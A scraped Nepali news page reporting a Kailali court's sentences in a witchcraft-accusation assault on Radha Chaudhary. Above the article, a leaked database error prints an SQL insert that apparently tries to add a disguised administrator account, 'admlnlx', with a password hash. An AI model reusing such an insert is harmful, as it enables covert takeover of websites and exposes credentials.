WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzrpzAqWANCe3kUXRIYjm5BoF2a26y0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 14:34:28', '', 'admlnlx', 'admlnlx')

बोक्सी आरोपमा राधा चौधरीमाथि कुटपिट गर्ने मुख्या अभियुक्त भोलेबाबालाई पाँच वर्ष कैदको आदेश – Gaule Khabar

बोक्सी आरोपमा राधा चौधरीमाथि कुटपिट गर्ने मुख्या अभियुक्त भोलेबाबालाई पाँच वर्ष कैदको आदेश

बोक्सी आरोपमा राधा चौधरीमाथि कुटपिट गर्ने मुख्या अभियुक्त भोलेबाबालाई पाँच वर्ष कैदको आदेश

धनगढीः जिल्ला अदालत कैलालीले बोक्सीको आरोपमा निर्घात कुटपिट गर्ने तीन जनालाई दोषी ठहर गरेको छ। अदालतले तीन जनालाई सफाइ दिएको छ।

कैलालीको घोडाघोडी नगरपालिका, ५ देउकलियाकी राधा चौधरीमाथि बोक्सीको आरोपमा निर्घात कुटपिट गर्ने भोलेबाबा भनिने राम बहादुर चौधरीसहित तीन जनालाई दोषी ठहर गरेको अदालतका श्रेष्तेदार इन्द्र कठायतले जानकारी दिए।

अदालतले भोलेबाबालाई पाँच वर्ष कैद र एक लाख जरिवाना गर्ने आदेश दिएको कठायतले जानकारी दिए।

भोलेबाका सहयोगी किस्मती चौधरीलाई एक वर्ष कैद र ५० हजार जरिवाना र स्मारिका चौधरीलाई ६ महिना कैद र २५ हजार जरिवाना भराउने आदेश भएको छ।

जिल्ला न्यायाधीश पर्शुराम भट्टराईको एकल इजलासले भोलेबाबालाई सहयोग गरेको भन्दै पक्राउ परेका अन्य तीन जनालाई भने सफाइ दिएको छ। अदालतले स्थानीय चनकलाल चौधरी, वेदप्रसाद चौधरी र सीतारानी चौधरीलाई अदालतले सफाइ दिएको हो।

गत फागुन २४ गते बोक्सीको आरोपमा राधा चौधरीमाथि गाउँमै कुटपिट भएको थियो। बोक्सीको आरोपमा राधा चौधरीमाथि कुटपिट गरेको भन्दै ६ जनाविरुद्ध ज्यान मार्ने उद्योग अन्तर्गत मुद्दा चलाइएको थियो।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका